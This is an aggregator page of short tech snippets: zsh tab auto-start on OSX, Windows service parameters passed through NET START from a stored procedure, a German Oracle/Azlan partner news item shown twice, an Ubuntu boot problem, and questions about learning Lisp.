Tags: BPM Standard Edition,BPM Suite,BPM,SOA Specialization award,SOA Community,Oracle SOA,Oracle BPM,BPM Community,OPN,Jürgen Kress

    Read the article

  • Configuring zsh in OSX to auto start processes

    - by calumbrodie
    I've recently converted to using zsh instead of bash in OSX and was wondering if it is possible to do the following: When I launch my terminal I would like to start various tabs and have each tab run a different process e.g tailing logs, running ruby scripts etc. Currently I need to cmd+n multiple tabs and then manually start each process. While this doesn't take long I would like to be able to just launch my terminal and have these various tabs start and run those commands automatically. Is this possible?

    Read the article

  • NET START command not passing parameters in Windows Server 2008

    - by Amanbbk
    My application calls a Stored Procedure, through the stored procedure I am calling a Windows Service using the NET START command as follows: SELECT @Cmd = 'Net Start ServiceName /"' + @param1 + '" /"' + @param2 + '"' Now the parameters passed here are not reaching the OnStart method. These values are blank. Protected Overrides Sub OnStart(ByVal args() As String) Try service1= New Service service1.param2 = args(1) service1.param1 = args(0) Here I get args(0) as the name of service instead of the value that is passed, and args(1) is blank. Although the args.Getlength(0) returns 2. The service starts successfully, it invokes the executable, but the parameters are not there. What can be the reason? Administrative access might be required in NET START command? Has the syntax changed for NET START command in Windows Server 2008? Windows Services do not accept parameters in Windows Server 2008? The same thing is running fine on Windows Server 2003.

    Read the article

  • Erfolgreicher Start für Solution Center von Azlan

    - by A&C Redaktion
    Von links nach rechts: Rainer Hunkler, Hunkler GmbH & Co. KG / Birgit Nehring, Director Software & Solutions TDAzlan Am 11. Juni war es so weit: Der Distributor Tech Data Azlan eröffnete feierlich das zertifizierte Oracle Solutions Center (wir berichteten). Zugegen waren auch diverse Oracle Partner. Sie sind es, an die sich das neue Angebot vorrangig richtet: Das beeindruckend ausgestattete Oracle Authorized Solutions Center (OASC) steht Partnern künftig zur Verfügung, um vor allem Engineered Systems, aber auch Klassiker wie den Sparc-Server zu testen und ihren Kunden live vorzuführen. Unterstützt werden Interessierte dabei durch den Azlan-Consultant Ingo Frobenius und sein Team ausgewiesener Oracle Spezialisten. Es ist sogar möglich, die Systeme auszuleihen, wenn der Test in einer besonderen Umgebung erfolgen soll. Gemeinsam mit Birgit Nehring, Director Software und Solutions bei Azlan, feierten hochrangige Oracle Vertreter wie Christian Werner diesen Meilenstein für Oracle und Azlan. Einen ausführlichen Bericht von der Eröffnung mit Hintergründen zur Neuausrichtung im Channel-Business und der Oracle Strategie bezüglich Engineered Systems lesen Sie in der aktuellen Ausgabe der IT-Business unter der Überschrift „Azlan nimmt Demo-Center für Oracle Produkte in Betrieb“.

    Read the article

  • Erfolgreicher Start für Solution Center von Azlan

    - by A&C Redaktion
    Von links nach rechts: Rainer Hunkler, Hunkler GmbH & Co. KG / Birgit Nehring, Director Software & Solutions TDAzlan Am 11. Juni war es so weit: Der Distributor Tech Data Azlan eröffnete feierlich das zertifizierte Oracle Solutions Center (wir berichteten). Zugegen waren auch diverse Oracle Partner. Sie sind es, an die sich das neue Angebot vorrangig richtet: Das beeindruckend ausgestattete Oracle Authorized Solutions Center (OASC) steht Partnern künftig zur Verfügung, um vor allem Engineered Systems, aber auch Klassiker wie den Sparc-Server zu testen und ihren Kunden live vorzuführen. Unterstützt werden Interessierte dabei durch den Azlan-Consultant Ingo Frobenius und sein Team ausgewiesener Oracle Spezialisten. Es ist sogar möglich, die Systeme auszuleihen, wenn der Test in einer besonderen Umgebung erfolgen soll. Gemeinsam mit Birgit Nehring, Director Software und Solutions bei Azlan, feierten hochrangige Oracle Vertreter wie Christian Werner diesen Meilenstein für Oracle und Azlan. Einen ausführlichen Bericht von der Eröffnung mit Hintergründen zur Neuausrichtung im Channel-Business und der Oracle Strategie bezüglich Engineered Systems lesen Sie in der aktuellen Ausgabe der IT-Business unter der Überschrift „Azlan nimmt Demo-Center für Oracle Produkte in Betrieb“.

    Read the article

  • Ubuntu 12.04 doesn't start after installing with LiveUSB

    - by Kevin Arutyunyan
    I need help! I installed Ubuntu with my LiveUSB, and it said restart to use your system, so I restarted. Now I am just stuck in a completely black screen with a blinking _ I'm already waiting 10 minutes for something to happen, but there's nothing. I don't know what the problem could be, but maybe the message I got during installation that said 'APT couldn't be configured, so no additional apps will be installed' was the problem? I'm still waiting.. Fast answers please :) thanks.

    Read the article

  • How should I start with Lisp?

    - by Gary Rowe
    I've been programming for years now, working my way through various iterations of Blub (BASIC, Assembler, C, C++, Visual Basic, Java, Ruby in no particular order of "Blub-ness") and I'd like to learn Lisp. However, I have a lot of intertia what with limited time (family, full time job etc) and a comfortable happiness with my current Blub (Java). So my question is this, given that I'm someone who would really like to learn Lisp, what would be the initial steps to get a good result that demonstrates the superiority of Lisp in web development? Maybe I'm missing the point, but that's how I would initially see the application of my Lisp knowledge. I'm thinking "use dialect A, use IDE B, follow instructions on page C, question your sanity after monads using counsellor D". I'd just like to know what people here consider to be an optimal set of values for A, B, C and perhaps D. Also some discussion on the relative merit of learning such a powerful language as opposed to, say, becoming a Rails expert. Just to add some more detail, I'll be developing on MacOS (or a Linux VM) - no Windows based approaches will be necessary, thanks. Notes for those just browsing by I'm going to keep this question open for a while so that I can offer feedback on the suggestions after I've been able to explore them. If you happen to be browsing by and feel you have something to add, please do. I would really welcome your feedback. Interesting links Assuming you're coming at Lisp from a Java background, this set of links will get you started quickly. Using Intellij's La Clojure plugin to integrate Lisp (videocast) Lisp for the Web Online version of Practical Common Lisp (c/o Frank Shearar) Land of Lisp a (+ (+ very quirky) game based) way in but makes it all so straightforward

    Read the article

< Previous Page | 25 26 27 28 29 30 31 32 33 34 35 36  | Next Page >